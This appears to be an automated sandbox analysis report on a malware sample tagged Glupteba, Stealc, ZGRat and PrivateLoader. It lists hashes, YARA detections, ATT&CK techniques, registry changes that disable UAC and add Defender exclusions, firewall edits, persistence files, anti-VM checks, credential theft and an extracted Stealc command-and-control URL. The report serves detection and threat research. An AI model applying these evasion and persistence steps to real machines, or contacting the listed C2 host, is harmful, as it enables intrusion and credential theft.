glupteba | 93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb

Analysis

max time kernel
42s
max time network
107s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
06-05-2024 06:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe
Size

405KB
MD5

4c03ddbf5fe9e55346e426b78c9a9b2c
SHA1

e8ad3b30d021822fe4c9f6d9c3645bd712224ee7
SHA256

93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb
SHA512

9abc493c5e467667890933b0663370797734fb625cc0fa80f59195606315bbf77c4f4882b20f5c4b1f999dbfb397bacd65c992ef071b21a076b056a55431e325
SSDEEP

12288:KB9cAtoKCYsciDNH2HwRM4J3jaEt1hUj2:U9cOviBH2QG45aEt1hUS

Score

10^/10

glupteba privateloader stealc zgrat discovery dropper evasion execution loader rat spyware stealer themida trojan

Malware Config

Extracted

Family

stealc

http://185.172.128.150

Attributes

url_path
/c698e1bc8a2f5e6d.php

Signatures

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral1/memory/5604-560-0x00000296A0020000-0x00000296A3918000-memory.dmp	family_zgrat_v1
behavioral1/memory/5604-567-0x00000296BDEA0000-0x00000296BDEC4000-memory.dmp	family_zgrat_v1
behavioral1/memory/5604-563-0x00000296BE1A0000-0x00000296BE2B0000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 14 IoCs

resource	yara_rule
behavioral1/memory/4108-345-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral1/memory/2776-346-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral1/memory/1680-388-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral1/memory/912-389-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral1/memory/1240-589-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral1/memory/2416-592-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral1/memory/1840-590-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral1/memory/540-591-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral1/memory/1240-594-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral1/memory/1840-595-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral1/memory/1240-748-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral1/memory/2416-753-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral1/memory/540-750-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral1/memory/1840-749-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	MjEh43PKin7fzW9jTjb4sn2m.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe

Windows security bypass 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe = "0"	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	MjEh43PKin7fzW9jTjb4sn2m.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MjEh43PKin7fzW9jTjb4sn2m.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4572	powershell.exe
4540	powershell.exe
6104	powershell.exe
4556	powershell.exe
5508	powershell.exe
5716	powershell.exe
5736	powershell.exe
2416	powershell.exe
5392	powershell.exe
6404	powershell.exe
6776	powershell.exe
3632	powershell.exe
5376	powershell.exe
1596	powershell.exe
4540	powershell.exe
6980	powershell.exe
3748	powershell.exe
6436	powershell.exe
4032	powershell.exe
5400	powershell.exe
5384	powershell.exe
5420	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3672	netsh.exe
5860	netsh.exe
1436	netsh.exe
7020	netsh.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MjEh43PKin7fzW9jTjb4sn2m.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MjEh43PKin7fzW9jTjb4sn2m.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	nzdZVAzy9neJhn8ydaNXrKn4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	u2zo.1.exe

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SLzUpBJ6tilUmiSNiOja1ZZN.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9KJZ3EfwgNtvDOZOYf7KHqpf.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yw296jQBFwS4vG6QyohWcu6P.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Pu7aMCfdMiCOSz0N5lX57JQt.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5ozufRBcEt8slXdpznujq8Vf.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CiWhWq3mJ4iZOXb2dkxk9KLF.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gpYlT5T6iexp5D4fp82Xr93Q.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9TDHi8hirbxXIRCrKatr6Psh.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c6GGNSi1QreGd0q2FONSuNdI.bat	regsvcs.exe

Executes dropped EXE 18 IoCs

pid	Process
3876	nzdZVAzy9neJhn8ydaNXrKn4.exe
2776	iFQ3i4zTragG5MkMNJmom56V.exe
4108	zeo5zozOaxuOySqtFMn9rWZ4.exe
1680	Pct74ve8YCYTcYkmbkRGjd5g.exe
912	23q9cthFtmRYAO9RwfXtM5UM.exe
4004	u2zo.0.exe
4528	MjEh43PKin7fzW9jTjb4sn2m.exe
3904	u2zo.1.exe
1240	Pct74ve8YCYTcYkmbkRGjd5g.exe
1840	iFQ3i4zTragG5MkMNJmom56V.exe
540	zeo5zozOaxuOySqtFMn9rWZ4.exe
2416	23q9cthFtmRYAO9RwfXtM5UM.exe
3156	gwpEgkgV1c8yxV8wk0CZ9pf7.exe
4708	y5ehIzpWgSNs1PgS6tel86nE.exe
3632	Install.exe
4328	Install.exe
6440	Install.exe
6496	Install.exe

Loads dropped DLL 2 IoCs

pid	Process
4004	u2zo.0.exe
4004	u2zo.0.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000c000000023bc1-268.dat	themida
behavioral1/memory/4528-288-0x0000000140000000-0x0000000140861000-memory.dmp	themida
behavioral1/memory/4528-396-0x0000000140000000-0x0000000140861000-memory.dmp	themida

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	MjEh43PKin7fzW9jTjb4sn2m.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe = "0"	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MjEh43PKin7fzW9jTjb4sn2m.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	pastebin.com
10	pastebin.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
60	api.myip.com
61	api.myip.com
65	ipinfo.io
66	ipinfo.io

Drops file in System32 directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy	MjEh43PKin7fzW9jTjb4sn2m.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	MjEh43PKin7fzW9jTjb4sn2m.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	MjEh43PKin7fzW9jTjb4sn2m.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	MjEh43PKin7fzW9jTjb4sn2m.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4528	MjEh43PKin7fzW9jTjb4sn2m.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4856 set thread context of 2252	4856	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	88

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	iFQ3i4zTragG5MkMNJmom56V.exe
File opened (read-only)	\??\VBoxMiniRdrDN	Pct74ve8YCYTcYkmbkRGjd5g.exe
File opened (read-only)	\??\VBoxMiniRdrDN	zeo5zozOaxuOySqtFMn9rWZ4.exe
File opened (read-only)	\??\VBoxMiniRdrDN	23q9cthFtmRYAO9RwfXtM5UM.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2744	3876	WerFault.exe	96
1628	4004	WerFault.exe	101

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2zo.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2zo.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2zo.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u2zo.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u2zo.0.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5916	schtasks.exe
4940	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	zeo5zozOaxuOySqtFMn9rWZ4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	iFQ3i4zTragG5MkMNJmom56V.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time"	iFQ3i4zTragG5MkMNJmom56V.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	Pct74ve8YCYTcYkmbkRGjd5g.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	Pct74ve8YCYTcYkmbkRGjd5g.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	Pct74ve8YCYTcYkmbkRGjd5g.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	23q9cthFtmRYAO9RwfXtM5UM.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	zeo5zozOaxuOySqtFMn9rWZ4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	iFQ3i4zTragG5MkMNJmom56V.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	zeo5zozOaxuOySqtFMn9rWZ4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	23q9cthFtmRYAO9RwfXtM5UM.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	iFQ3i4zTragG5MkMNJmom56V.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	23q9cthFtmRYAO9RwfXtM5UM.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	zeo5zozOaxuOySqtFMn9rWZ4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	zeo5zozOaxuOySqtFMn9rWZ4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	23q9cthFtmRYAO9RwfXtM5UM.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time"	zeo5zozOaxuOySqtFMn9rWZ4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	zeo5zozOaxuOySqtFMn9rWZ4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	23q9cthFtmRYAO9RwfXtM5UM.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	Pct74ve8YCYTcYkmbkRGjd5g.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	zeo5zozOaxuOySqtFMn9rWZ4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	zeo5zozOaxuOySqtFMn9rWZ4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Pct74ve8YCYTcYkmbkRGjd5g.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	23q9cthFtmRYAO9RwfXtM5UM.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	23q9cthFtmRYAO9RwfXtM5UM.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	iFQ3i4zTragG5MkMNJmom56V.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	23q9cthFtmRYAO9RwfXtM5UM.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	23q9cthFtmRYAO9RwfXtM5UM.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	Pct74ve8YCYTcYkmbkRGjd5g.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	Pct74ve8YCYTcYkmbkRGjd5g.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	Pct74ve8YCYTcYkmbkRGjd5g.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	Pct74ve8YCYTcYkmbkRGjd5g.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	23q9cthFtmRYAO9RwfXtM5UM.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	23q9cthFtmRYAO9RwfXtM5UM.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	zeo5zozOaxuOySqtFMn9rWZ4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	23q9cthFtmRYAO9RwfXtM5UM.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	iFQ3i4zTragG5MkMNJmom56V.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	Pct74ve8YCYTcYkmbkRGjd5g.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4572	powershell.exe
4572	powershell.exe
4004	u2zo.0.exe
4004	u2zo.0.exe
1596	powershell.exe
1596	powershell.exe
3632	powershell.exe
3632	powershell.exe
2416	powershell.exe
2416	powershell.exe
4032	powershell.exe
4032	powershell.exe
2416	powershell.exe
3632	powershell.exe
1596	powershell.exe
4032	powershell.exe
4004	u2zo.0.exe
4004	u2zo.0.exe
912	23q9cthFtmRYAO9RwfXtM5UM.exe
912	23q9cthFtmRYAO9RwfXtM5UM.exe
2776	iFQ3i4zTragG5MkMNJmom56V.exe
